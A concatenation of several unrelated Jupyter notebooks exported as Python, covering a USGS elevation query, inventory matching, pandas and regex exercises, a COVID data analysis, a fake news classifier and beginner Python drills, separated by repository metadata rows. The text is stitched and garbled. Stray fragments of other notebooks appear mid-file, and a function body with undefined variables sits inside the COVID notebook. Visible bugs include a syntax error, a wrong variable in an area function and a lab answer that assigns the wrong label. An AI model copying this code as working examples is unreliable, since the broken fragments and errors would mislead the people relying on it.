# - Set option to retrieve elevations from offline source, or through the USGS queries
# - Set option to only test the USGS query (NOTE: running the query function for the whole dataset will take 24+ hours)
# - Create a function to make a remote request to the USGS API
# - Create a function to supply inputs to the remote request and return the elevation value
# - Main sequence
# - Read in dataset
# - Create circl_elev column
# - Loop through the dataset in chunks of 10000 to get elevation data
# - (Optional) Retrieve elevations from offline data source instead of queries
# - Write new dataset .txt file
#
# ## References
# - elevation query: https://stackoverflow.com/questions/58350063/obtain-elevation-from-latitude-longitude-coordinates-with-a-simple-python-script
# - lamda functions: https://thispointer.com/python-how-to-use-if-else-elif-in-lambda-functions/
# - apply on Nulls: https://stackoverflow.com/questions/26614465/python-pandas-apply-function-if-a-column-value-is-not-null
# Imports
import pandas as pd
import numpy as np
import requests
import urllib
import urllib3
import time
import gzip
import logging
import sys
from datetime import datetime
# Check to see if you are running 32-bit Python (output would be False)
# 32-bit Python could result in Memory Error when reading in large dataset
import sys
sys.maxsize > 2**32
# ## Set File Paths and Runtime Options
# +
# Used to classify the name
time_now = datetime.today().strftime('%Y%m%d%H%M%S')
# File paths and script options
PATH_TO_PAIRED_DATA = "../data/Cloud_Data/1.1-circles_to_many_stations_usa_weather_data_20200424213015.csv"
PATH_TO_OFFLINE_ELEVATION_DATA = "../data/Cloud_Data/1.2-ijd-fetch-circle-elevations-OFFLINE.csv"
PATH_TO_LOG_FILE = "../data/Cloud_Data/1.2-ijd-fetch_circle_elevations_"+time_now+".log"
# option to pull offline elevation data from the /attic instead of running the queries
get_offline_data = False
# option to run a simple test of the query; only 1000 rows are queried instead of full dataset
test_query = False
# -
# ## Create a Log File
if not get_offline_data:
logging.basicConfig(filename=PATH_TO_LOG_FILE,
filemode='w',
format='%(message)s',
level=logging.INFO)
logging.info('This log file shows the row index, lat, lon\n')
# ## Create a function to make a remote request to the USGS API
def make_remote_request(url: str, params: dict):
"""
Makes the remote request
Continues making attempts until it succeeds
"""
count = 1
while True:
try:
response = requests.get((url + urllib.parse.urlencode(params)))
time.sleep(1)
except (OSError, urllib3.exceptions.ProtocolError) as error:
logging.info('\n')
logging.info('*' * 20, 'Error Occured', '*' * 20)
logging.info(f'Number of tries: {count}')
logging.info(f'URL: {url}')
logging.info(error)
logging.info('\n')
count += 1
time.sleep(0.5)
continue
break
return response
# ## Create a function to supply inputs to the remote request and return the elevation value
def elevation_function(x):
"""
x - longitude
y - latitude
returns elevation in meters
"""
url = 'https://nationalmap.gov/epqs/pqs.php?'
params = {'x': x[1],
'y': x[0],
'units': 'Meters',
'output': 'json'}
logging.info(str(x.name)+'\t\t'+str(x[0])+'\t\t'+str(x[1])) # print row index, lat, lon
result = make_remote_request(url, params)
return result.json()['USGS_Elevation_Point_Query_Service']['Elevation_Query']['Elevation']
# ## Loops to Query the USGS API
# Boolean to skip loop of queries and just pull elevation data from the "attic"
if not get_offline_data:
# load paired data file
#data_iterator = pd.read_csv(PATH_TO_TEMP_DATA, chunksize=1000, encoding = "ISO-8859-1", sep="\t")
data_iterator = pd.read_csv(PATH_TO_PAIRED_DATA, chunksize=1000, compression='gzip')
chunk_list = []
# Each chunk is in dataframe format
for data_chunk in data_iterator:
# create elevation column
data_chunk.loc[:, 'circle_elev'] = np.nan
# initial list of indices which are missing elevations
missing = data_chunk.loc[data_chunk['circle_elev'].isnull()].index
# while loop to go over the dataset chunk times in the event that query requests fail
cnt=0 # counter to break while loop after
while len(missing) > 0:
if cnt == 5: break # exit while loop
cnt+=1
logging.info('while counter: '+str(cnt))
try:
# combination of apply() function and lambda() function, only on nulls (see reference links above)
data_chunk.loc[:, 'circle_elev'] = data_chunk.loc[:, ['lat', 'lon', 'circle_elev']].apply(lambda x: elevation_function(x[0:2]) if(pd.isnull(x[2])) else x[2], axis=1)
except:
# on occasion query completely fails and crashes the function call
# problem is the stack prints to the notebook
# https://gist.github.com/wassname/d17325f36c36fa663dd7de3c09a55e74
#logging.error("Exception occurred", exc_info=True)
logging.info("Exception occurred")
continue
# get new list of missing indices
missing = data_chunk.loc[data_chunk['circle_elev'].isnull()].index
# break the loop if there are no missing elevations
if len(missing) == 0: break
# Append data chunk with elevation data to combined list
chunk_list.append(data_chunk)
# Convert combined list into dataframe
filtered_data = pd.concat(chunk_list)
# Intermediate writes to .csv file so work is not lost in the event of code failure
filtered_data.to_csv("../data/Cloud_Data/1.2-ijd-fetch-circle-elevations_INT.csv", sep=',', index=False)
del(filtered_data)
# If just running a test, break the loop
if test_query: break
# Convert combined list into dataframe
filtered_data = pd.concat(chunk_list)
# close log file
#log.close()
# ## (Optional) Get Elevation Data from Offline Source
if get_offline_data:
# load offline data file
offline_data = pd.read_csv(PATH_TO_OFFLINE_ELEVATION_DATA)
# convert count_date to string or merge won't match them properly
offline_data['count_date'] = pd.to_datetime(offline_data['count_date'])
# round the latitude and longitudes to 4 digits
offline_data['lat'] = offline_data['lat'].round(3)
offline_data['lon'] = offline_data['lon'].round(3)
# load paired data file
#data_iterator = pd.read_csv(PATH_TO_TEMP_DATA, chunksize=10000, encoding = "ISO-8859-1", sep="\t")
data_iterator = pd.read_csv(PATH_TO_PAIRED_DATA,
compression='gzip',
chunksize=10000)
chunk_list = []
# Each chunk is in dataframe format
print('The chunks should be the same length after merge.')
for data_chunk in data_iterator:
data_chunk['count_date'] = pd.to_datetime(data_chunk['count_date'])
data_chunk['lat'] = data_chunk['lat'].round(3)
data_chunk['lon'] = data_chunk['lon'].round(3)
filtered_chunk = pd.merge(data_chunk,
offline_data[['lat', 'lon', 'count_date', 'count_year', 'id', 'circle_elev']],
on=['lat', 'lon', 'count_date', 'count_year', 'id'],
how='left',
copy=False)
chunk_list.append(filtered_chunk)
print('Chunk Length Before: ', data_chunk.shape)
print('Chunk Length After: ', filtered_chunk.shape)
filtered_data = pd.concat(chunk_list)
# find duplicates in offline data
if get_offline_data:
offline_data.duplicated(subset=['lat', 'lon', 'count_date', 'count_year', 'id']).value_counts()
# are there any duplicates in the data chunk?
if get_offline_data:
data_chunk.duplicated(subset=['lat', 'lon', 'count_date', 'count_year', 'id']).value_counts()
# ## Screen Elevation Data
# Ensure elevations are the float
filtered_data = pd.concat(chunk_list)
filtered_data.loc[:, 'circle_elev'] = filtered_data.loc[:, 'circle_elev'].astype(float)
# Remove bad elevation values
filtered_data.loc[filtered_data['circle_elev'] < -10000.0, 'circle_elev'] = np.nan
filtered_data[['lat', 'lon', 'count_date', 'circle_elev']].head(50)
# Create histogram of elevations
filtered_data.hist(column='circle_elev')
# Same number of rows? Should be 109390
len(filtered_data.index)
# drop unnamed columns
# they were likely index columns auto-generated by pandas and then written to csv files, unintentionally
filtered_data = filtered_data.loc[:, ~filtered_data.columns.str.contains('^Unnamed')]
# sort dataframe on existing index
filtered_data.sort_values(['int64_field_0'], ascending=[True], inplace=True)
filtered_data.head()
if get_offline_data:
print('If from an offline source, check to make sure circle elevations are not being lost during merge:\n')
print('NA in Merged:\n', filtered_data['circle_elev'].isna().value_counts())
print('\n')
print('NA in Offline:\n', offline_data['circle_elev'].isna().value_counts())
print('Missing elevations:')
filtered_data['circle_elev'].isna().value_counts()
print('How many elevations at sea level?')
filtered_data.loc[filtered_data['circle_elev'] == 0.0].shape
# ## Save the output
filtered_data.to_csv("../data/Cloud_Data/1.2-ijd-fetch-circle-elevations_"+time_now+".csv",
sep=',',
compression='gzip',
index=False)
| 11,335 |
/src/.ipynb_checkpoints/storage_match-checkpoint.ipynb
|
085e4421ccd7a1a329b3c43f9dfcf1468c3401f3
|
[] |
no_license
|
Liu-Ruiyang/Fossil-Finance-Processor
|
https://github.com/Liu-Ruiyang/Fossil-Finance-Processor
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 48,189 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import pandas as pd
import numpy as np
import natsort
pd.set_option('display.max_rows', None)
from decimal import *
getcontext().prec = 2
from tkinter import *
import tkinter as tk
import tkinter.messagebox as messagebox
from functools import partial
# -
# 分别读三个表,以NAV为基准。 nav == p1+(changed)
def get_nav(file_name):
file = pd.read_excel(file_name, sheet_name='NAV P1')
df = pd.DataFrame(file)
nav_array = np.array(df)
return nav_array
def get_tp(file_name):
file = pd.read_excel(file_name, sheet_name='TP P1')
df = pd.DataFrame(file)
tp_array = np.array(df)
return tp_array
def get_sent(file_name):
file = pd.read_excel(file_name, sheet_name='已发货未入库')
df = pd.DataFrame(file)
sent_array = np.array(df)
return sent_array
def check_storage(nav_array,tp_array,sent_array):
result_df = pd.DataFrame(columns=['AX','NAV','TP','sent','differ'])
for i in range(0,len(nav_array)):
ax = nav_array[i,0]
nav_num = nav_array[i,1]
locs = np.argwhere(ax==tp_array)
if len(locs)>1:
print('found duplicate in TP')
elif len(locs)<1:
print('found no TP, and ax is '+ax)
else:
# len(locs) == 1
index_tp = locs[0][0]
tp_ax = tp_array[index_tp][1]
tp_num = tp_array[index_tp][2]
if(ax==tp_ax):
diff = nav_num - tp_num
if diff != 0:
locs = np.argwhere(ax==sent_array)
# consider there are duplicates in sent_array
sent_all = 0
for loc in locs:
index = loc[0]
sent_all = sent_all + sent_array[index,4]
diff = diff - sent_all
new_data = {
'AX' : ax,
'NAV' : nav_num,
'TP' : tp_num,
'sent' : sent_all,
'differ' : diff
}
result_df = result_df.append(new_data,ignore_index=True)
else:
new_data = {
'AX' : ax,
'NAV' : nav_num,
'TP' : tp_num,
'differ' : diff
}
result_df = result_df.append(new_data,ignore_index=True)
else:
print('error : ax and tp_ax do not match!')
return result_df
# +
file_name = '../Processor/Category/2021 P1 AX 库存核对- r.xlsx'
nav_array = get_nav(file_name)
tp_array = get_tp(file_name)
sent_array = get_sent(file_name)
result_df = check_storage(nav_array,tp_array,sent_array)
result_df
# -
ax = nav_array[1,0]
locs = np.argwhere(ax==tp_array)
index_tp = locs[0][0]
tp_ax = tp_array[index_tp][1]
tp_num = tp_array[index_tp][2]
print(tp_ax)
print(tp_num)
| 3,162 |
/labs/lab7.ipynb
|
63773ec3c6e777b340b67d6f005aae89307aa5cf
|
[] |
no_license
|
elvinafakhritdinova/first
|
https://github.com/elvinafakhritdinova/first
| 0 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 25,018 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Задание 1**
# Для датафрейма log из материалов занятия создайте столбец source_type по следующим правилам:
#
# если источник traffic_source равен yandex или google, то в source_type ставится organic
# для источников paid и email из России - ставим ad
# для источников paid и email не из России - ставим other
# все остальные варианты берем из traffic_source без изменений
#
#
import pandas as pd
import numpy as np
log = pd.read_csv('12._Python_12_pivot_and_str/visit_log.csv', sep=';')
log.head()
log.loc[log.traffic_source.isin(['yandex','google']), 'source_type']='organic'
log.head(10)
log.loc[(log.region=='Russia')&(log.traffic_source.isin(['paid','email'])), 'source_type']='organic'
log.head(10)
# **Задание 2**
# В файле URLs.txt содержатся url страниц новостного сайта. Вам необходимо отфильтровать его по адресам страниц с текстами новостей. Известно, что шаблон страницы новостей имеет внутри url следующую конструкцию: /, затем 8 цифр, затем дефис. Выполните следующие действия:
#
# Прочитайте содержимое файла с датафрейм
# Отфильтруйте страницы с текстом новостей, используя метод str.contains и регулярное выражение в соответствии с заданным шаблоном
table = pd.read_csv('URLs.txt')
reg = r'/\d{8}-'
table[table.url.str.contains(reg)]
# **Задание 3**
# В датафрейме data создайте столбец lemmas, в котором вычислите леммы поисковых запросов из столбца keyword. Леммы должны иметь строковый тип.
from pymystem3 import Mystem
data = pd.DataFrame({
'keyword': ['курс гривны к рублю', 'доллары в рубли', '100 долларов в рублях', 'курс рубля'],
'shows': [125076, 114173, 97534, 53546],
})
def makelem(dateFrame):
lemmas = ' '.join(Mystem().lemmatize(dateFrame['keyword']))
return lemmas.strip()
data['lemmas'] = data.apply(makelem, axis=1)
data.head()
g
word2idx = tokenizer.word_index
print('Found %s unique tokens.' % len(word2idx))
# pad sequences so that we get a N x T matrix
data = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)
print('Shape of data tensor:', data.shape)
# prepare embedding matrix
print('Filling pre-trained embeddings...')
num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)
embedding_matrix = np.zeros((num_words, EMBEDDING_DIM))
for word, i in word2idx.items():
if i < MAX_VOCAB_SIZE:
embedding_vector = word2vec.get(word)
if embedding_vector is not None:
# words not found in embedding index will be all zeros.
embedding_matrix[i] = embedding_vector
# load pre-trained word embeddings into an Embedding layer
# note that we set trainable = False so as to keep the embeddings fixed
embedding_layer = Embedding(
num_words,
EMBEDDING_DIM,
weights=[embedding_matrix],
input_length=MAX_SEQUENCE_LENGTH,
trainable=False
)
print('Building model...')
# create an LSTM network with a single LSTM
input_ = Input(shape=(MAX_SEQUENCE_LENGTH,))
x = embedding_layer(input_)
# x = LSTM(15, return_sequences=True)(x)
x = Bidirectional(LSTM(15, return_sequences=True))(x)
x = GlobalMaxPool1D()(x)
output = Dense(len(possible_labels), activation="sigmoid")(x)
model = Model(input_, output)
model.compile(
loss='binary_crossentropy',
optimizer=Adam(lr=0.01),
metrics=['accuracy'],
)
print('Training model...')
r = model.fit(
data,
targets,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_split=VALIDATION_SPLIT
)
# plot some data
plt.plot(r.history['loss'], label='loss')
plt.plot(r.history['val_loss'], label='val_loss')
plt.legend()
plt.show()
# accuracies
plt.plot(r.history['accuracy'], label='acc')
plt.plot(r.history['val_accuracy'], label='val_acc')
plt.legend()
plt.show()
p = model.predict(data)
aucs = []
for j in range(6):
auc = roc_auc_score(targets[:,j], p[:,j])
aucs.append(auc)
print(np.mean(aucs))
| 4,013 |
/Jim.ipynb
|
df2da60b167e004911c2583e021b5bb938dc3b4d
|
[] |
no_license
|
SamanthaWang0117/covid_coursework
|
https://github.com/SamanthaWang0117/covid_coursework
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 108,139 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Analysis of COVID-19 data
# With help from Carmen and her associates!
from pathlib import Path
from process_covid import (load_covid_data,
cases_per_population_by_age,
hospital_vs_confirmed,
create_confirmed_plot,
count_high_rain_low_tests_days)
# The data for each area is held in a specific file. Start by loading it in.
data_directory = Path("covid_data")
data_file = "ER-Mi-EV_2020-03-16_2020-04-24.json"
data_er = load_covid_data(data_directory / data_file)
print(data_er)
type(data_er)
# And now I can use this variable to do my different analyses.
#
# First, I want to see how the number of cases has changed across time, but separated into age groups. This will help me find age-dependent patterns in the spread of the virus.
cases_population = cases_per_population_by_age(data_er)
cases_population.get('0-24', "No data in that bin")
# I am also interested in how many cases end up in hospital. Specifically, I want to look at the ratio
# $$\frac{\textrm{people hospitalised}}{\textrm{confirmed cases}}$$
# and how it changes over time.
#
# I haven't decided what exactly I'll do with it yet, so for now I only want to get two lists: one with the dates on which the ratio is computed, and another with its corrsponding values.
hosp_conf_dates, hosp_conf_ratio = hospital_vs_confirmed(data_er)
for date, ratio in zip(hosp_conf_dates[:5], hosp_conf_ratio[:5]):
print(f" {date}: {ratio:.2f}")
# Plots will be crucial for getting the information across efficiently. Carmen says that this one function is flexible enough to process the data in different ways. One thing I want to see is the evolution of confirmed cases grouped by the patient's sex. This command should plot two lines, one each for male and female:
create_confirmed_plot(data_er, sex=True)
if sex == False and len(max_age) > 0:
# for each max_age number in the max_age
for k in range(1, len(Index_hosp) + 1):
if len(max_age) == k:
age_group = []
for a in input_data["evolution"].values():
age_sum_per_day = 0
for i in range(0, k):
# skip the Null value and sum up all the useful value
if a["epidemiology"]["confirmed"][status]["age"][i] is None:
continue
else:
age_sum_per_day = age_sum_per_day + a["epidemiology"]["confirmed"][status]["age"][i]
age_group.append(age_sum_per_day)
return age_group
if sex == False and len(max_age) == 0:
raise NotImplementedError('wrong input')
if sex == True and len(max_age) > 0:
raise NotImplementedError('wrong input')
for a in input_data["evolution"].values():
each_day.append(a["epidemiology"]["confirmed"]["total"]["age"])
if each_day == [] or each_day[0:len(data_list)] is None:
raise NotImplementedError("the age group is missing")
# return each_day
# find out the null dataset and delete it.
# return each_day
for i in range(len(data_list)):
b = each_day[i]
index = 0
try:
if b[0] is None or len(b) == 0:
del data_list[i]
index = index + 1
continue
else:
for k in range(len(overall)):
each_data_per.append(b[index] / overall[index])
index = index + 1
except:
raise NotImplementedError("the missing data in files")
# return each_data_per
# Only the reasonable value can be reserved.
# grant value to each age group
for day in range(len(data_list)):
for i in range(len(x3)):
result[x3[i]].append((data_list[day], each_data_per[day * len(overall) + i]))
# However, I also want to break it down by age instead of sex. In particular, I want to see the cases involving people
# - up to age 15 (or the age bin they belong to);
# - up to age 37;
# - and up to age 99
#
# all in the same plot.
create_confirmed_plot(data_er, max_ages=[15, 37, 99])
# Finally, I want to see if the weather affects how likely people are to get tested. To simplify, I'll consider a day to be "rainy" if it rained more than the previous day. Out of those rainy days, on how many were there fewer tests carried out than the previous day? Because the data will be noisy, I first want to smooth the data by replacing each value with the average of the values in a 7-day window around it. Then I will use the smoothened values for this calculation instead of the originals.
#
# Carmen says that this one line should do all that:
ratio = count_high_rain_low_tests_days(data_er)
print(f"A {ratio * 100:6.2f}% of rainy days affected the number of tests")
# Let's see what works!
| 5,292 |
/SAO_Fake_News_Predictor.ipynb
|
f8089bd661f9360af6ae4b36063129ea9b51f89f
|
[] |
no_license
|
owais-code/Tech-A-Thon---SAO-s_Fake_News_Predictor
|
https://github.com/owais-code/Tech-A-Thon---SAO-s_Fake_News_Predictor
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 31,804 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3.9.6 64-bit
# name: python3
# ---
# + [markdown] id="_QakZYWA0YB6"
# Team SAO presents to you a high accuracy model to predict whether the news is real or fake.
# + [markdown] id="FaIBmnXCknPl"
# **Dataset Description**
#
# 1. id: Unique serial number of the news
# 2. title: Title of a news
# 3. author: Author/Editor of the news article
# 4. content: The text of the article
# 5. label: a label that marks whether the news article is real or fake:
# 1: if Fake news
# 0: if real News
#
#
#
#
# + [markdown] id="k399dHafvL5N"
# Importing the Dependencies
# + id="-fetC5yqkPVe"
import numpy as np
import pandas as pd
import re
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
# + colab={"base_uri": "https://localhost:8080/"} id="1AC1YpmGwIDw" outputId="deb5c972-ac0a-43c1-f0d5-6cfa30e498fa"
import nltk
nltk.download('stopwords')#downloading stopwords package
# + colab={"base_uri": "https://localhost:8080/"} id="dxIOt3DowpUR" outputId="9f3409ac-c6bf-4276-8767-cbc9e00f2781"
# Printing stopwords in English
print(stopwords.words('english'))
# + [markdown] id="NjeGd1CLw_6R"
# Data Pre-processing
# + id="nCGcpu_1wzLw" colab={"base_uri": "https://localhost:8080/", "height": 502} outputId="b9e7eb9c-9b13-4279-8054-90741e8a9298"
# loading our train.csv dataset to a pandas DataFrame
news_dataset = pd.read_csv('train.csv')
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="aRgmbYSbxV4-" outputId="8d4581fc-fec7-4715-fa78-b2b3a1baa61b"
news_dataset.shape
# + id="jjJ1eB6RxZaS"
# To see starting few data entries
news_dataset.head()
# + id="QYkDi4SwxlKi"
# Here Team SAO is counting the number of missing values in our dataset
news_dataset.isnull().sum()
# + id="Mc04lQrhx57m"
# Replacing the null values with empty string to increase the accuracy of dataset
news_dataset = news_dataset.fillna('')
# + id="H7TZgHszygxj"
# merging the columns, author name and title present in the dataset
news_dataset['content'] = news_dataset['author']+' '+news_dataset['title']
# + id="cbF6GBBpzBey"
print(news_dataset['content'])#lets see what is in the content section
# + id="LfBtAvLtzEo6"
# separating the data & label and assigning varaible X and Y to them
X = news_dataset.drop(columns='label', axis=1)
Y = news_dataset['label']
# + id="oHPBr540zl1h"
print(X)
print(Y)
# + [markdown] id="0NwFcpqcz37a"
# What is Stemming ?
#
# Stemming is a method of reducing a word to its ROOT WORD
#
# like:
# coder, coding, codes --> code ||
#
# Let's use this feature
# + id="Ga_DaZxhzoWM"
port_stem = PorterStemmer()
# + id="zY-n0dCh0e-y"
def stemming(content):
stemmed_content = re.sub('[^a-zA-Z]',' ',content)
stemmed_content = stemmed_content.lower()
stemmed_content = stemmed_content.split()
stemmed_content = [port_stem.stem(word) for word in stemmed_content if not word in stopwords.words('english')]
stemmed_content = ' '.join(stemmed_content)
return stemmed_content
# + [markdown] id="rU619EGAtmFA"
# Now Applying stemming on content section of our dataset
# + id="MBUIk4c94yTL"
news_dataset['content'] = news_dataset['content'].apply(stemming)
# + id="xmwK-zyO5Stg"
print(news_dataset['content']) #to see the effect stemming had on our dataset i.e. all words comes to its root version
# + id="5ZIidnta5k5h"
#separating the data and label columns
X = news_dataset['content'].values
Y = news_dataset['label'].values
# + id="3nA_SBZX6BeH"
print(X) #to see what went in variable X
# + id="NgkFGXkg6HS4"
print(Y) #to see what went in variable Y
# + id="Iu2ZEBkL6QTm"
Y.shape
# + id="BMfepsQZ6TES"
# converting the textual data(STRING) to numerical data using vectorizer to make the model simpler.
vectorizer = TfidfVectorizer()
vectorizer.fit(X)
X = vectorizer.transform(X)
# + id="MJj5esbs7Nzy"
print(X)
# + [markdown] id="mKBRGiSQ7YCZ"
# Splitting the dataset to training & test data
#
# 1. 80% in training
# 2. 20% in test
# 3. Stratifying Y to ensure all training or test set doesn't get only one kind of outcome
#
#
#
#
# + id="VjMYwmBo7Pbx"
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.2, stratify=Y, random_state=2)
# + [markdown] id="rxDsQvgO8Oln"
# Training our Model: Bringing in Logistic Regression
# + id="HrSItcqc7qAy"
model = LogisticRegression()
# + id="fdVJ839l8Vgx"
model.fit(X_train, Y_train)
# + [markdown] id="sbPKIFT89W1C"
# Result time for the Model
# + [markdown] id="YG6gqVty9ZDB"
# **Checking Accuracy Score**
# + id="VgwtWZY59PBw"
# accuracy score on the training data
X_train_prediction = model.predict(X_train)
training_data_accuracy = accuracy_score(X_train_prediction, Y_train)
# + id="4L-r5mld-BFn"
print('Accuracy score of the training data : ', training_data_accuracy*100, "%") # printing accuracy score of our training data
# + id="Kgcn13oO-H6e"
# accuracy score on the test data
X_test_prediction = model.predict(X_test)
test_data_accuracy = accuracy_score(X_test_prediction, Y_test)
# + id="9TG0Yof1-vg2"
print('Accuracy score of the test data : ', test_data_accuracy*100, "%") # printing accuracy score of our test data
# + [markdown] id="Yun4seaE-6tV"
# So now we have got a nice score, let's predict now
# + id="lPjssDL_-zo8"
#Predicting News Id No. 48 for example
X_new = X_test[3]
prediction = model.predict(X_new) #predicting
print(prediction)
if (prediction[0]==0):
print('\t\tThe news is Real\n')
else:
print('\t\tThe news is Fake\n')
# -
print("Thanks\nTeam SAO")
nv1(x))
# +
x = torch.randn(1, 1, 3, 3)
describe(x)
conv1 = nn.Conv2d(in_channels=1, out_channels=2, kernel_size=2)
describe(conv1.weight)
describe(conv1(x))
| 6,058 |
/misc_notebook/generate_nn_ma.ipynb
|
f2d47072712689fc17bcf9058af41b4d1515dc6e
|
[
"BSD-2-Clause"
] |
permissive
|
pursueorigin/multi-center-fed-learning
|
https://github.com/pursueorigin/multi-center-fed-learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,753 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# < > == <= >= !=
# -
a = 10
b = 20
a<b
# +
# if <condition>:
# <operations>
# elif <condition>:
# <operations>
# else:
# <operations>
# +
if a>b:
print("a is greater")
elif a<b:
print("b is greater")
else:
print("Both are equal")
# +
a = int(input("Enter a = "))
b = int(input("Enter b = "))
if a>b:
print("a is greater")
elif a<b:
print("b is greater")
else:
print("Both are equal")
# +
# and or
a = int(input("Enter a = "))
b = int(input("Enter b = "))
c = int(input("Enter c = "))
if (a>b) and (a>c):
print("a is greater")
elif b>a and b>c:
print("b is greater")
elif c>a and c>b:
print("c is greater")
else:
print("Both are equal")
# -
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(a+b)
elif o == '-':
print(a-b)
elif o == '*':
print(a*b)
elif o == '/':
print(a/b)
else:
print("Invalid operator")
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(a+b)
elif o == '-':
print(a-b)
elif o == '*':
print(a*b)
elif o == '/' and b!=0:
print(a/b)
elif b == 0:
print("Value of b can not be zero.")
else:
print("Invalid operator")
# +
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mul(a,b):
return a*b
def div(a,b):
return a/b
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(add(a,b))
elif o == '-':
print(sub(a,b))
elif o == '*':
print(mul(a,b))
elif o == '/' and b!=0:
print(div(a,b))
elif b == 0:
print("Value of b can not be zero.")
else:
print("Invalid operator")
# +
def cal():
p = float(input("Enter p = "))
t = float(input("Enter t = "))
r = float(input("Enter r = "))
i = p*t*r/100
print("The i = ",i)
x = input("Enter y for more calculations = ")
if x == 'y':
cal()
else:
print("The program is ended.")
cal()
# +
# Nested If
# if <condition>:
# if <condition>:
# ...
# ..
# +
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mul(a,b):
return a*b
def div(a,b):
return a/b
a = int(input("Enter a = "))
b = int(input("Enter b = "))
o = input("Enter operator + - * / =")
if o =='+':
print(add(a,b))
elif o == '-':
print(sub(a,b))
elif o == '*':
print(mul(a,b))
elif o == '/':
if b != 0:
print(div(a,b))
else b == 0:
print("Value of b can not be zero.")
else:
print("Invalid operator")
# +
def area(l,b):
return a*b
def volume(l,b,h):
return l*b*h
l = int(input("Enter l = "))
b = int(input("Enter b = "))
h = int(input("Enter h = "))
x = input("Enter 1 for area 2 for volume = ")
if x == '1':
print(area(l,b))
elif x == '2':
print(volume(l,b,h))
else:
print("Invalid input")
# -
size=64,
validation_data=(x_test, y_test))
model.evaluate(x_test, y_test, verbose=1)
# +
num_workers = 40
n_train = len(y_train)
n_test = len(y_test)
idxs = np.random.permutation(n_train)
batch_idxs = np.array_split(idxs, num_workers)
for j in range(num_workers):
model = create_mlp()
train_features, train_labels = x_train[batch_idxs[j]], y_train[batch_idxs[j]]
model.fit(train_features, train_labels, batch_size=64, epochs=10, validation_data=(x_test, y_test), verbose=0)
Ws = model.get_weights()
with open("cifar10_{}.pb".format(j), 'wb+') as f:
pickle.dump(Ws, f)
# +
maps = {i: dataidx for i, dataidx in enumerate(batch_idxs)}
def saved_cls_counts(net_dataidx_map):
net_cls_counts = {}
for net_i, dataidx in net_dataidx_map.items():
unq, unq_cnt = np.unique(y_train[dataidx], return_counts=True)
tmp = {unq[i]: unq_cnt[i] for i in range(len(unq))}
net_cls_counts[net_i] = tmp
with open('cifar10_counts', 'wb+') as f:
pickle.dump(net_cls_counts, f)
saved_cls_counts(maps)
# -
| 4,285 |
/main.ipynb
|
5848a501d70de38d51d57a62779be77fb7c8f65c
|
[] |
no_license
|
gauravsaxena1983/SamplePythonProject
|
https://github.com/gauravsaxena1983/SamplePythonProject
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 904 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# 1. No spaces between them
# 2. It shouldnot start by a number
# 3. In place of space we write underscore (_)
# -
__a__ = 1
a = "2"
b = "2"
print(a + b)
a=2
a=a<<3
print(a)
print("hello {name1} and {name2}".format(name1="muzammil",name2="hasan"))
# +
# Pemdas Rule
# P = parathesis
# e = exponent
# m = multiplication
# d = divide
# a = addition
# s = subtration
a = (2+3)**2+4*5-1/1
print(a)
# -
print( 4/3*(2-1) )
print(4+3%5); print(7%5);print(16%15//16)
print(int(43.55+2/2));print('{0:.2}'.format(1/3))
if (9 < 0) and (0 < -9):
print("hello")
elif (9 > 0) or False:
print("good")
else:
print("bad")
not(10<20) and not(10>30)
not(10<20) or not(10>30)
if 7>=8 :
print ("yes") ; print ("yes"); print ("yes")
print ("yes")
print ("yes")
h=[]
h
h=["muzammil",36,5.4,81,True,[304,204],81]
h;h[5][1]
h.index(81,4)
h.count(81)
h[3]
h=["muzammil","hasan","ali","waqar"]
h
g=h
g[0]="hasan"
h
h[2]="syed"
h
if 'Syed' in h:
print(1)
else:
print(2)
h.append("ali")
h
# +
names1 = ['Amir', 'Bala', 'Charlie']
names2 = [name.lower() for name in names1]
print(names2[2][0])
# -
names1+=names2
print(names1)
h+=["syed","syed"]
h
h.insert(4,"qaiser")
h
z=h[2:5]
x=z[:2]
p=z[1:]
print(z)
print(x)
print(p)
del h[3]
h
h.remove("syed")
h
z=h.pop()
z
z=h.pop(1)
z
h
h[1].upper()
h
for name in h:
print(name)
if name == "muzammil":
print ("your are authorized")
# sets
